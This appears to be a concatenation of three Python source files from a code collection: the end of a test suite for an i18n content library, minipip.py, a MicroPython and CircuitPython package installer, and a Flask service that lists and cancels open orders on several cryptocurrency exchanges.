data = cio.load('sv-se@page/title')
self.assertEqual(data['uri'], 'i18n://sv-se@page/title.txt#1')
self.assertEqual(data['data'], u'Content-IO')
def test_search(self):
cio.set('i18n://sv-se@label/email.txt', u'e-post')
uris = cio.search()
self.assertEqual(len(uris), 1)
uris = cio.search('foo/')
self.assertEqual(len(uris), 0)
uris = cio.search('label/')
self.assertEqual(len(uris), 1)
def test_environment_state(self):
with cio.env(i18n='en-us'):
node = cio.get('page/title')
self.assertEqual(node.uri, 'i18n://en-us@page/title.txt')
node = cio.get('page/title')
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt')
def test_non_distinct_uri(self):
node1 = cio.get('page/title', u'Title1')
node2 = cio.get('page/title', u'Title2')
self.assertEqual(six.text_type(node1), u'Title1')
self.assertEqual(six.text_type(node2), u'Title1')
node1 = cio.get('page/title', u'Title1', lazy=False)
cache.clear()
node2 = cio.get('page/title', u'Title2', lazy=False)
self.assertEqual(six.text_type(node1), u'Title1')
self.assertEqual(six.text_type(node2), u'Title2') # Second node not buffered, therefore unique default content
def test_fallback(self):
with cio.env(i18n=('sv-se', 'en-us', 'en-uk')):
cio.set('i18n://bogus@label/email.txt', u'epost')
cio.set('i18n://en-uk@label/surname.txt', u'surname')
with self.assertCache(misses=2, sets=2):
with self.assertDB(calls=6, selects=6):
node1 = cio.get('i18n://label/email')
node2 = cio.get('i18n://label/surname', u'efternamn')
self.assertEqual(node1.uri.namespace, 'sv-se') # No fallback, stuck on first namespace, sv-se
self.assertEqual(node1.namespace_uri.namespace, 'sv-se')
self.assertIsNone(node1.content)
self.assertEqual(node2.uri.namespace, 'en-uk')
self.assertEqual(node2.namespace_uri.namespace, 'sv-se')
self.assertEqual(node2.content, u'surname')
cache.clear()
with self.assertCache(misses=2, sets=2):
with self.assertDB(calls=6):
cio.get('i18n://label/email', lazy=False)
cio.get('i18n://label/surname', u'lastname', lazy=False)
def test_uri_redirect(self):
cio.set('i18n://sv-se@page/title.txt', u'Title')
node = cio.get('i18n://sv-se@page/title', u'Default')
self.assertEqual(node.uri, 'i18n://sv-se@page/title.txt#1')
self.assertEqual(node.content, u'Title')
node = cio.get('i18n://sv-se@page/title.up', u'Default Upper', lazy=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up')
        self.assertEqual(node.content, u'DEFAULT UPPER')  # Cache still contains 'Title', but the requested plugin (.up) differs, so the cached value is skipped
cached_node = cache.get(node.uri)
self.assertDictEqual(cached_node, {'uri': node.uri, 'content': u'DEFAULT UPPER'})
cache.clear()
node = cio.get('i18n://sv-se@page/title.up', u'Default-Upper', lazy=False)
self.assertEqual(node.uri, 'i18n://sv-se@page/title.up')
self.assertEqual(node.content, u'DEFAULT-UPPER') # Cache cleared, storage plugin mismatch, default fallback
def test_node_meta(self):
node = cio.set('sv-se@page/title', u'', author=u'lundberg')
self.assertEqual(node.meta.get('author'), u'lundberg')
node = cio.get('page/title')
self.assertEqual(len(node.meta.keys()), 0) # Cached node has no meta
node = cio.load('sv-se@page/title#1')
meta = node['meta']
self.assertKeys(meta, 'author', 'modified_at', 'published_at', 'is_published')
self.assertEqual(meta.get('author'), u'lundberg')
cio.set('sv-se@page/title#1', u'', comment=u'This works!')
node = cio.load('sv-se@page/title#1')
meta = node['meta']
self.assertKeys(meta, 'author', 'comment', 'modified_at', 'published_at', 'is_published')
self.assertEqual(meta.get('author'), u'lundberg')
self.assertEqual(meta.get('comment'), u'This works!')
cio.set('sv-se@page/title#1', u'', comment=None)
node = cio.load('sv-se@page/title#1')
meta = node['meta']
self.assertKeys(meta, 'author', 'modified_at', 'published_at', 'is_published')
self.assertEqual(meta.get('author'), u'lundberg')
self.assertNotIn('comment', meta)
def test_pipes_hits(self):
with cio.env(i18n=('sv-se', 'en-us')):
with self.assertDB(inserts=2):
with self.assertCache(calls=2, sets=2):
cio.set('i18n://sv-se@label/email.txt', u'epost')
cio.set('i18n://en-us@label/surname.txt', u'surname')
# Lazy gets
with self.assertDB(calls=0):
with self.assertCache(calls=0):
node1 = cio.get('label/email')
node2 = cio.get('i18n://label/surname')
node3 = cio.get('i18n://monkey@label/zipcode', default=u'postnummer')
# with self.assertDB(calls=2), self.assertCache(calls=5, hits=1, misses=2, sets=2):
with self.assertDB(calls=4, selects=4):
with self.assertCache(calls=2, hits=1, misses=2, sets=2):
self.assertEqual(six.text_type(node1), u'epost')
self.assertEqual(node2.content, u'surname')
self.assertEqual(six.text_type(node3), u'postnummer')
with self.assertDB(calls=0):
with self.assertCache(calls=1, hits=3):
node1 = cio.get('label/email')
node2 = cio.get('i18n://label/surname')
node3 = cio.get('i18n://monkey@label/zipcode', default=u'postnummer')
self.assertEqual(six.text_type(node1), u'epost')
self.assertEqual(node2.content, u'surname')
self.assertEqual(six.text_type(node3), u'postnummer')
self.assertIsNotNone(repr(node1))
self.assertIsNotNone(str(node1))
def test_forced_empty_content(self):
with self.assertRaises(ValueError):
cio.set('i18n://sv-se@none', None)
node = cio.set('i18n://sv-se@empty.txt', u'')
node = cio.get(node.uri, default=u'fallback')
self.assertEqual(six.text_type(node), u'')
def test_load_pipeline(self):
with self.assertRaises(ImportError):
pipeline.add_pipe('foo.Bar')
def test_unknown_plugin(self):
with self.assertRaises(ImproperlyConfigured):
cio.set('i18n://sv-se@foo/bar.baz#draft', 'raise')
def test_abandoned_buffered_node(self):
cio.set('sv-se@foo/bar', u'foobar')
node = cio.get('foo/bar')
self.assertFalse(node._flushed)
self.assertIn('get', pipeline._buffer._buffer)
# Mess things up...
pipeline.clear()
self.assertFalse(node._flushed)
self.assertNotIn('get', pipeline._buffer._buffer)
self.assertEqual(node.content, u'foobar')
self.assertTrue(node._flushed)
|
minipip.py
|
#!/usr/bin/env python3
"""
MIT License
Copyright (c) 2021 Aivar Annamaa
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import io
import json
import os.path
import sys
import shlex
import shutil
import subprocess
import tarfile
import tempfile
import textwrap
import threading
from html.parser import HTMLParser
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import BaseRequestHandler, BaseServer
from typing import Union, List, Dict, Any, Optional, Tuple, Callable
from urllib.error import HTTPError
from urllib.request import urlopen
import pkg_resources
import logging
import typing
try:
from shlex import join as shlex_join
except ImportError:
# before Python 3.8
def shlex_join(split_command):
"""Return a shell-escaped string from *split_command*."""
return " ".join(shlex.quote(arg) for arg in split_command)
from pkg_resources import Requirement
logger = logging.getLogger(__name__)
MP_ORG_INDEX = "https://micropython.org/pi"
PYPI_INDEX = "https://pypi.org/pypi"
PYPI_SIMPLE_INDEX = "https://pypi.org/simple"
DEFAULT_INDEX_URLS = [MP_ORG_INDEX, PYPI_INDEX]
SERVER_ENCODING = "utf-8"
__version__ = "0.1b5"
class FileUrlsParser(HTMLParser):
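    # Parses a PyPI "simple" index page: every <a> element is recorded in
    # self.file_urls as {link text: href}, i.e. {file name: download URL}.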
def error(self, message):
pass
def __init__(self):
self._current_tag: str = ""
self._current_attrs: List[Tuple[str, str]] = []
self.file_urls: Dict[str, str] = {}
super().__init__()
def handle_starttag(self, tag: str, attrs: List[Tuple[str, str]]) -> None:
self._current_tag = tag
self._current_attrs = attrs
def handle_data(self, data: str) -> None:
if self._current_tag == "a":
for att, val in self._current_attrs:
if att == "href":
self.file_urls[data] = val
def handle_endtag(self, tag):
pass
class Downloader:
def __init__(self, index_url: str):
self._index_url = index_url.rstrip("/")
self._file_urls_cache: Dict[str, Dict[str, str]] = {}
def get_file_urls(self, dist_name: str) -> Dict[str, str]:
if dist_name not in self._file_urls_cache:
self._file_urls_cache[dist_name] = self._download_file_urls(dist_name)
return self._file_urls_cache[dist_name]
def _download_file_urls(self, dist_name) -> Dict[str, str]:
url = f"{self._index_url}/{dist_name}"
logger.debug("Downloading %s", url)
with urlopen(url) as fp:
parser = FileUrlsParser()
parser.feed(fp.read().decode("utf-8"))
return parser.file_urls
def download_file(self, dist_name: str, file_name: str) -> typing.BinaryIO:
urls = self.get_file_urls(dist_name)
assert file_name in urls
result = urlopen(urls[file_name])
logger.debug("Headers: %r", result.headers.items())
return result
class MinipipServer(HTTPServer):
def __init__(
self,
server_address: Tuple[str, int],
request_handler_class: Callable[..., BaseRequestHandler],
):
self.downloader = Downloader(PYPI_SIMPLE_INDEX)
super().__init__(server_address, request_handler_class)
_server: Optional[MinipipServer] = None
def close_server():
global _server
if _server is not None:
_server.shutdown()
_server = None
class MinipipProxyHandler(BaseHTTPRequestHandler):
def __init__(self, request: bytes, client_address: Tuple[str, int], server: BaseServer):
print("CREATING NEW HANDLER")
assert isinstance(server, MinipipServer)
self._downloader = server.downloader
super(MinipipProxyHandler, self).__init__(request, client_address, server)
def do_GET(self) -> None:
path = self.path.strip("/")
logger.debug("do_GET for %s", path)
if "/" in path:
assert path.count("/") == 1
self._serve_file(*path.split("/"))
else:
self._serve_distribution_page(path)
def _serve_distribution_page(self, dist_name: str) -> None:
logger.debug("Serving index page for %s", dist_name)
file_urls = self._downloader.get_file_urls(dist_name)
self.send_response(200)
self.send_header("Content-type", f"text/html; charset={SERVER_ENCODING}")
self.end_headers()
self.wfile.write("<!DOCTYPE html><html><body>\n".encode(SERVER_ENCODING))
for file_name in file_urls:
self.wfile.write(
f"<a href='/{dist_name}/{file_name}/'>{file_name}</a>\n".encode(SERVER_ENCODING)
)
self.wfile.write("</body></html>".encode(SERVER_ENCODING))
def _serve_file(self, dist_name, file_name):
logger.debug("Serving %s for %s", file_name, dist_name)
fp = self._downloader.download_file(dist_name, file_name)
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
while True:
block = fp.read(4096)
if block:
self.wfile.write(block)
else:
break
class UserError(RuntimeError):
pass
class NotUpipCompatible(RuntimeError):
pass
def install(
spec: Union[List[str], str],
target_dir: str,
index_urls: List[str] = None,
port: Optional[str] = None,
):
if not index_urls:
index_urls = DEFAULT_INDEX_URLS
if isinstance(spec, str):
specs = [spec]
else:
specs = spec
temp_dir = tempfile.mkdtemp()
try:
_install_to_local_temp_dir(specs, temp_dir, index_urls)
_remove_unneeded_files(temp_dir)
if port is not None:
_copy_to_micropython_over_serial(temp_dir, port, target_dir)
else:
_copy_to_local_target_dir(temp_dir, target_dir)
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def _copy_to_local_target_dir(source_dir: str, target_dir: str):
logger.info("Copying files to %s", os.path.abspath(target_dir))
if not os.path.exists(target_dir):
logger.info("Target directory '%s' doesn't exist. Creating.", target_dir)
os.makedirs(target_dir, mode=0o700)
# Copying manually in order to be able to use os.fsync
# see https://learn.adafruit.com/adafruit-circuit-playground-express/creating-and-editing-code
# #1-use-an-editor-that-writes-out-the-file-completely-when-you-save-it
for root, dirs, files in os.walk(source_dir):
relative_dir = root[len(source_dir) :].lstrip("/\\")
full_target_dir = os.path.join(target_dir, relative_dir)
for dir_name in dirs:
full_path = os.path.join(full_target_dir, dir_name)
if os.path.isdir(full_path):
logger.info("Directory %s already exists", os.path.join(relative_dir, dir_name))
elif os.path.isfile(full_path):
raise UserError("Can't treat existing file %s as directory", full_path)
else:
logger.info("Creating %s", os.path.join(relative_dir, dir_name))
os.makedirs(full_path, 0o700)
for file_name in files:
full_source_path = os.path.join(root, file_name)
full_target_path = os.path.join(full_target_dir, file_name)
logger.debug("Preparing %s => %s", full_source_path, full_target_path)
if os.path.isfile(full_target_path):
logger.info("Overwriting %s", os.path.join(relative_dir, file_name))
elif os.path.isdir(full_target_path):
raise UserError("Can't treat existing directory %s as file", full_target_path)
else:
logger.info("Copying %s", os.path.join(relative_dir, file_name))
with open(full_source_path, "rb") as in_fp, open(full_target_path, "wb") as out_fp:
out_fp.write(in_fp.read())
out_fp.flush()
os.fsync(out_fp)
def _copy_to_micropython_over_serial(source_dir: str, port: str, target_dir: str):
assert target_dir.startswith("/")
cmd = _get_rshell_command() + ["-p", port, "rsync", source_dir, "/pyboard" + target_dir]
logger.debug("Uploading with rsync: %s", shlex_join(cmd))
subprocess.check_call(cmd)
def _get_rshell_command() -> Optional[List[str]]:
if shutil.which("rshell"):
return ["rshell"]
else:
return None
def _install_to_local_temp_dir(
specs: List[str], temp_install_dir: str, index_urls: List[str]
) -> None:
pip_specs = _install_all_upip_compatible(specs, temp_install_dir, index_urls)
if pip_specs:
_install_with_pip(pip_specs, temp_install_dir, index_urls)
def _install_all_upip_compatible(
specs: List[str], install_dir: str, index_urls: List[str]
) -> List[str]:
"""Returns list of specs which must be installed with pip"""
installed_specs = set()
specs_to_be_processed = specs.copy()
pip_specs = []
while specs_to_be_processed:
spec = specs_to_be_processed.pop(0)
if spec in installed_specs or spec in pip_specs:
continue
req = pkg_resources.Requirement.parse(spec)
logger.info("Processing '%s'", req)
meta, version = _fetch_metadata_and_resolve_version(req, index_urls)
logger.info("Inspecting version %s", version)
assets = meta["releases"][version]
if len(assets) != 1 or not assets[0]["url"].endswith(".tar.gz"):
logger.info(
"'%s' will be installed with pip (not having single tar.gz asset).",
req.project_name,
)
pip_specs.append(spec)
continue
try:
dep_specs = _install_single_upip_compatible_from_url(
req.project_name, assets[0]["url"], install_dir
)
installed_specs.add(spec)
if dep_specs:
logger.info("Dependencies of '%s': %s", spec, dep_specs)
for dep_spec in dep_specs:
if dep_spec not in installed_specs and dep_spec not in specs_to_be_processed:
specs_to_be_processed.append(dep_spec)
except NotUpipCompatible:
pip_specs.append(spec)
return pip_specs
def _install_single_upip_compatible_from_url(
project_name: str, url: str, target_dir: str
) -> List[str]:
with urlopen(url) as fp:
download_data = fp.read()
tar = tarfile.open(fileobj=io.BytesIO(download_data), mode="r:gz")
deps = []
content: Dict[str, Optional[bytes]] = {}
for info in tar:
if "/" in info.name:
dist_name, rel_name = info.name.split("/", maxsplit=1)
else:
dist_name, rel_name = info.name, ""
if rel_name == "setup.py":
logger.debug("The archive contains setup.py. The package will be installed with pip")
raise NotUpipCompatible()
if ".egg-info/PKG-INFO" in rel_name:
continue
if ".egg-info/requires.txt" in rel_name:
for line in tar.extractfile(info):
line = line.strip()
if line and not line.startswith(b"#"):
deps.append(line.decode())
continue
if ".egg-info" in rel_name:
continue
if info.isdir():
content[os.path.join(target_dir, rel_name)] = None
elif info.isfile():
content[os.path.join(target_dir, rel_name)] = tar.extractfile(info).read()
# write files only after the package is fully inspected and found to be upip compatible
logger.info("Extracting '%s' from %s to %s", project_name, url, os.path.abspath(target_dir))
for path in content:
data = content[path]
if data is None:
os.makedirs(path, exist_ok=True)
else:
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, "wb") as fp:
fp.write(data)
return deps
def _install_with_pip(specs: List[str], target_dir: str, index_urls: List[str]):
global _server
logger.info("Installing with pip: %s", specs)
suitable_indexes = [url for url in index_urls if url != MP_ORG_INDEX]
if not suitable_indexes:
raise UserError("No suitable indexes for pip")
index_args = ["--index-url", suitable_indexes.pop(0)]
while suitable_indexes:
index_args += ["--extra-index-url", suitable_indexes.pop(0)]
if index_args == ["--index-url", "https://pypi.org/pypi"]:
# for some reason, this form does not work for some versions of some packages
# (eg. micropython-os below 0.4.4)
index_args = []
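        # Work around this by starting a local proxy (MinipipServer above) that
        # serves PyPI's "simple" index pages and files, and point pip at it.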
port = 8763
_server = MinipipServer(("", port), MinipipProxyHandler)
threading.Thread(name="minipip proxy", target=_server.serve_forever).start()
index_args = ["--index-url", "http://localhost:{port}/".format(port=port)]
args = [
"--no-input",
"--disable-pip-version-check",
"install",
"--no-compile",
"--upgrade",
"--target",
target_dir,
] + index_args
pip_cmd = (
[
sys.executable,
"-m",
"pip",
]
+ args
+ specs
)
logger.debug("Calling pip: %s", shlex_join(pip_cmd))
subprocess.check_call(pip_cmd)
close_server()
def _fetch_metadata_and_resolve_version(
req: Requirement, index_urls: List[str]
) -> Tuple[Dict[str, Any], str]:
ver_specs = req.specs
for i, index_url in enumerate(index_urls):
try:
url = "%s/%s/json" % (index_url, req.project_name)
logger.info("Querying package metadata from %s", url)
with urlopen(url) as fp:
meta = json.load(fp)
current_version = meta["info"]["version"]
if not ver_specs:
return meta, current_version
ver = _resolve_version(req, meta)
if ver is None:
logger.info("Could not find suitable version from %s", index_url)
continue
return meta, ver
except HTTPError as e:
if e.code == 404:
logger.info("Could not find '%s' from %s", req.project_name, index_url)
else:
raise
raise UserError(
"Could not find '%s' from any of the indexes %s" % (req.project_name, index_urls)
)
def _read_requirements(req_file: str) -> List[str]:
if not os.path.isfile(req_file):
raise UserError("Can't find file '%s'" % req_file)
result = []
with open(req_file, "r", errors="replace") as fp:
for line in fp:
line = line.strip()
if line and not line.startswith("#"):
result.append(line)
return result
def _resolve_version(req: Requirement, main_meta: Dict[str, Any]) -> Optional[str]:
matching_versions = []
for ver in main_meta["releases"]:
if ver in req and len(main_meta["releases"][ver]) > 0:
matching_versions.append(ver)
if not matching_versions:
return None
return sorted(matching_versions, key=pkg_resources.parse_version)[-1]
def _remove_unneeded_files(path: str) -> None:
unneeded = ["Scripts" if os.name == "nt" else "bin", "__pycache__"]
if "adafruit_blinka" in os.listdir(path):
unneeded += [
"adafruit_blinka",
"adafruit_platformdetect",
"Adafruit_PureIO",
"microcontroller",
"pyftdi",
"serial",
"usb",
"analogio.py",
"bitbangio.py",
"board.py",
"busio.py",
"digitalio.py",
"micropython.py",
"neopixel_write.py",
"pulseio.py",
"pwmio.py",
"rainbowio.py",
]
unneeded_suffixes = [".dist-info", ".egg-info", ".pyc"]
for name in os.listdir(path):
if name in unneeded or any(name.endswith(suffix) for suffix in unneeded_suffixes):
full_path = os.path.join(path, name)
if os.path.isfile(full_path):
os.remove(full_path)
else:
shutil.rmtree(full_path)
def error(msg):
msg = "ERROR: " + msg
if sys.stderr.isatty():
print("\x1b[31m", msg, "\x1b[0m", sep="", file=sys.stderr)
else:
print(msg, file=sys.stderr)
return 1
def main(raw_args: Optional[List[str]] = None) -> int:
if raw_args is None:
raw_args = sys.argv[1:]
import argparse
parser = argparse.ArgumentParser(
description="Tool for managing MicroPython and CircuitPython packages"
)
subparsers = parser.add_subparsers(
dest="command",
title="commands",
description='Use "minipip <command> -h" for usage help of a command ',
required=True,
)
install_parser = subparsers.add_parser(
"install",
help="Install a package",
description=textwrap.dedent(
"""
Meant for installing both upip and pip compatible distribution packages from
PyPI and micropython.org/pi to a local directory, USB volume or directly to
MicroPython filesystem over serial connection (requires rshell).
"""
).strip(),
)
install_parser.add_argument(
"specs",
help="Package specification, eg. 'micropython-os' or 'micropython-os>=0.6'",
nargs="*",
metavar="package_spec",
)
install_parser.add_argument(
"-r",
"--requirement",
help="Install from the given requirements file.",
nargs="*",
dest="requirement_files",
metavar="REQUIREMENT_FILE",
default=[],
)
install_parser.add_argument(
"-p",
"--port",
help="Serial port of the device "
"(specify if you want minipip to upload the result to the device)",
nargs="?",
)
install_parser.add_argument(
"-t",
"--target",
help="Target directory (on device, if port is given, otherwise local)",
default=".",
dest="target_dir",
metavar="TARGET_DIR",
required=True,
)
list_parser = subparsers.add_parser("list", help="List installed packages")
for p in [install_parser, list_parser]:
p.add_argument(
"-i",
"--index-url",
help="Custom index URL",
)
p.add_argument(
"-v",
"--verbose",
help="Show more details about the process",
action="store_true",
)
p.add_argument(
"-q",
"--quiet",
help="Don't show non-error output",
action="store_true",
)
parser.add_argument(
"--version", help="Show program version and exit", action="version", version=__version__
)
args = parser.parse_args(args=raw_args)
if args.command != "install":
sys.exit(error("Sorry, only 'install' command is supported at the moment"))
all_specs = args.specs
try:
for req_file in args.requirement_files:
all_specs.extend(_read_requirements(req_file))
except UserError as e:
sys.exit(error(str(e)))
if args.index_url:
index_urls = [args.index_url]
else:
index_urls = DEFAULT_INDEX_URLS
if args.quiet and args.verbose:
print("Can't be quiet and verbose at the same time", file=sys.stderr)
sys.exit(1)
if args.verbose:
logging_level = logging.DEBUG
elif args.quiet:
logging_level = logging.ERROR
else:
logging_level = logging.INFO
logger.setLevel(logging_level)
logger.propagate = True
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging_level)
logger.addHandler(console_handler)
if args.port and not _get_rshell_command():
return error("Could not find rshell (required for uploading when serial port is given)")
if args.port and not args.target_dir.startswith("/"):
return error("If port is given then target dir must be absolute Unix-style path")
if not all_specs:
return error("At least one package specifier or non-empty requirements file is required")
try:
install(all_specs, target_dir=args.target_dir, index_urls=index_urls, port=args.port)
except KeyboardInterrupt:
return 1
except UserError as e:
return error(str(e))
except subprocess.CalledProcessError:
# assuming the subprocess (pip or rshell) already printed the error
return 1
finally:
close_server()
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
run.py
|
import os
import time
from datetime import datetime
import logging
from flask import Flask
from flask import jsonify
import asyncio
import sys
from flask import request
from multiprocessing import Process
sys.path.append('../')
sys.path.append('../../')
sys.path.append('../strategy/')
from dquant.markets._binance_spot_rest import Binance
from dquant.markets._bitfinex_spot_rest import TradingV1
from dquant.markets._huobi_spot_rest import HuobiRest
from dquant.markets._okex_spot_rest import OkexSpotRest
from dquant.constants import Constants
from dquant.common.depth_log import init_roll_log
from flask_cors import *
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
CORS(app, supports_credentials=True)
meta_binance = ['eth_usdt', 'btc_usdt', 'eth_btc', 'eos_eth', 'bcc_eth']
meta_bfx = ['eth_btc']
meta_huobi = ['eth_usdt', 'eth_btc', 'eos_eth']
meta_ok = ['eth_usdt', 'eth_btc', 'btc_usdt', 'eos_eth', 'bch_eth']
meta_ok_symbol = ['btc_usd', 'eth_usd']
meta_ok_future_to_spot = {'btc_usd': 'btc_usdt', 'eth_usd': 'eth_usdt'}
meta_ok_contract = ['this_week', 'next_week', 'quarter']
# meta_ok_future = [s+'_'+c for s in meta_ok_symbol for c in meta_ok_contract]
os.environ[Constants.DQUANT_ENV] = "dev"
dlogger = init_roll_log('cancel_order.log')
logger = logging.getLogger("dquant")
okex_last_open_long_timestamp = None
def sucess_fail_record(platform, res):
if res['success']:
        dlogger.info('{}: cancel {} successfully'.format(platform, res['success']))
if res['fail']:
dlogger.info('{}: cancel {} failed'.format(platform, res['fail']))
@app.route('/cancel/binance/active_orders/get', methods=['GET'])
def get_binance_active_orders():
res = []
for meta_code in meta_binance:
bi = Binance(meta_code)
tmp = bi.get_active_orders()
if 'code' in tmp and 'msg' in tmp:
continue
        res.extend(tmp)  # reuse the response fetched above instead of calling the API again
return jsonify(res)
@app.route('/cancel/binance/active_orders/del', methods=['DELETE'])
def del_binance_active_orders():
res = {'result': True, 'success': [], 'fail': []}
for meta_code in meta_binance:
bi = Binance(meta_code)
tmp = bi.cancel_active_orders()
res['success'].extend(tmp['success'])
res['fail'].extend(tmp['fail'])
sucess_fail_record('binance', res)
return jsonify(res)
@app.route('/cancel/bfx/active_orders/get', methods=['GET'])
def get_bfx_active_orders():
res = []
for meta_code in meta_bfx:
bfx = TradingV1(meta_code)
res.extend(bfx.get_active_orders())
return jsonify(res)
@app.route('/cancel/bfx/active_orders/del', methods=['DELETE'])
def del_bfx_active_orders():
res = {'result': True}
for meta_code in meta_bfx:
bfx = TradingV1(meta_code)
tmp = bfx.cancel_active_orders()
print('tmp:', tmp)
if tmp['result'] == 'None to cancel':
continue
else:
dlogger.debug('bfx cancel result: {}'.format(res))
return jsonify(res)
res['result'] = False
    return jsonify(res)
@app.route('/cancel/huobi/active_orders/get', methods=['GET'])
def get_huobi_active_orders():
res = []
loop = asyncio.new_event_loop()
for meta_code in meta_huobi:
hb = HuobiRest(meta_code, loop)
res.extend(hb.get_activate_orders())
return jsonify(res)
@app.route('/cancel/huobi/active_orders/del', methods=['DELETE'])
def del_huobi_active_orders():
res = {'result': True, 'success': [], 'fail': []}
loop = asyncio.new_event_loop()
for meta_code in meta_huobi:
hb = HuobiRest(meta_code, loop)
tmp = hb.cancel_active_orders().get('data', {})
if tmp:
res['success'].extend(tmp['success'])
res['fail'].extend(tmp['failed'])
sucess_fail_record('huobi', res)
return jsonify(res)
@app.route('/cancel/okex/active_orders/get', methods=['GET'])
def get_okex_active_orders():
res = []
for meta_code in meta_ok:
ok = OkexSpotRest(meta_code)
res.extend(ok.get_active_orders())
return jsonify(res)
@app.route('/cancel/okex/active_orders/del', methods=['DELETE'])
def del_okex_active_orders():
'''
:return: {'success': [1,23], 'fail': [4]}
'''
res = {'result': True, 'success': [], 'fail': []}
for meta_code in meta_ok:
ok = OkexSpotRest(meta_code)
tmp = ok.cancel_active_orders()
if 'success' in tmp:
res['success'].extend(tmp['success'].split(','))
res['fail'].extend(tmp['error'].split(','))
elif 'result' in tmp:
if tmp['result']:
res['success'].append(tmp['order_id'])
else:
res['fail'].append(tmp['order_id'])
sucess_fail_record('okex', res)
return jsonify(res)
#
# @app.route('/cancel/okex_future/active_orders/get/<symbol>', methods=['GET'])
# def get_okexf_active_orders(symbol):
# # res_all = {}
# res = {'active_orders':[],
# 'positions':[],
# 'force_liqu_price':'',
# 'spot_price': 0,
# 'future_index': 0,
# 'premiums_and_discounts': 0,
# 'timestamp': int(time.time())}
# if symbol not in meta_ok_symbol:
# return jsonify(res)
# ok_f_index = OkexFutureRest(symbol+'_'+ 'this_week')
# ret_index = ok_f_index.get_index()
# ok_spot = OkexSpotRest(meta_ok_future_to_spot[symbol])
# ret_ticker = ok_spot.get_ticker()
# for meta_contract in meta_ok_contract:
# real_meta = symbol+'_'+ meta_contract
# # res = {'active_orders': [], 'positions': [], 'force_liqu_price': ''}
# ok_f = OkexFutureRest(real_meta)
# # res.extend(ok_f.get_active_orders())
# res['active_orders'].extend(ok_f.get_active_orders())
# ret_position = ok_f.getPosition()
# if ret_position and ret_ticker and ret_index:
# res['force_liqu_price'] = ret_position['force_liqu_price']
# # res_all[meta_code] = res
# res['spot_price'] = float(ret_ticker['ticker']['last'])
# res['timestamp'] = int(ret_ticker['date'])
# res['future_index'] = float(ret_index['future_index'])
# premiums_and_discounts = float(res['future_index'] - res['spot_price'])
# res['premiums_and_discounts'] = premiums_and_discounts
# if ret_position['holding']:
# for holding in ret_position['holding']:
# long_prifit_and_loss = 0.0
# if not holding['buy_available']:
# holding.update({"long_prifit_and_loss": long_prifit_and_loss})
# else:
# buy_available = float(holding['buy_available'])
# buy_price_avg = float(holding['buy_price_avg'])
# print(buy_available, buy_price_avg)
# long_prifit_and_loss = premiums_and_discounts * buy_available * 100 / buy_price_avg
# holding.update({"long_prifit_and_loss": long_prifit_and_loss})
# res['positions'].extend(ret_position['holding'])
# return jsonify(res)
# # return jsonify(res_all)
#
# @app.route('/cancel/okex_future/active_orders/del/<symbol>/long', methods=['DELETE'])
# def close_okexf_long_orders(symbol):
# # 分三步:1.取消未完成订单 2.平仓 3.补回现货
# res = {'result': False, 'success': [], 'fail': [], 'spot_results':[], 'msg':''}
# if symbol not in meta_ok_symbol:
# res['msg'] = u"暂不支持此类合约"
# return jsonify(res)
# spot_balance = OkexSpotRest(meta_ok_future_to_spot[symbol]).get_buy_balance_for_future()
# for meta_contract in meta_ok_contract:
# real_meta = symbol + '_' + meta_contract
# ok = OkexFutureRest(real_meta)
# ret_position = ok.getPosition()
# buy_available = 0
# if ret_position and 'holding' in ret_position:
# for holding in ret_position['holding']:
# buy_available += holding['buy_available']
# if spot_balance < buy_available*100:
# res['msg'] += u"现货账户余额不足:%s usdt; " % spot_balance
# return jsonify(res)
# ok.cancel_all_orders()
# result = ok.close_all_long_orders()
# res['success'].extend(result['success'])
# res['fail'].extend(result['fail'])
# price_to_be_buy_spot = float(result['success_amount']) * 100
# logger.info("price_to_be_buy_spot: %s" % price_to_be_buy_spot)
# if price_to_be_buy_spot:
# # spot_balance = OkexSpotRest(meta_ok_future_to_spot[symbol]).get_buy_balance_for_future()
# # if spot_balance < price_to_be_buy_spot:
# # res['msg'] += u"现货账户余额不足:%s usdt; " % spot_balance
# # return jsonify(res)
# ok_spot = OkexSpotRest(meta_ok_future_to_spot[symbol])
# spot_result = ok_spot.buy_step_by_step(price_to_be_buy_spot, 10)
# logger.info("flask %s price_to_be_buy_spot result: %s" % (meta_ok_future_to_spot[symbol], spot_result))
# res['spot_results'] = spot_result
# res['result'] = True
# return jsonify(res)
#
# @app.route('/cancel/okex_future/active_orders/del/<symbol>/short', methods=['DELETE'])
# def close_okexf_short_orders(symbol):
# res = {'result': True, 'success': [], 'fail': [], 'msg':''}
# if symbol not in meta_ok_symbol:
# res['msg'] = u"暂不支持此类合约"
# return jsonify(res)
# for meta_contract in meta_ok_contract:
# real_meta = symbol + '_' + meta_contract
# ok = OkexFutureRest(real_meta)
# result = ok.close_all_short_orders()
# res['success'].extend(result['success'])
# res['fail'].extend(result['fail'])
# return jsonify(res)
#
#
# @app.route('/cancel/okex_future/open_position/<symbol>/<contract>/<amount>', methods=['get'])
# def open_okexf_long_orders_get(symbol, contract, amount):
# res = {'result': False, 'msg': ''}
# now = time.time()
# global okex_last_open_long_timestamp
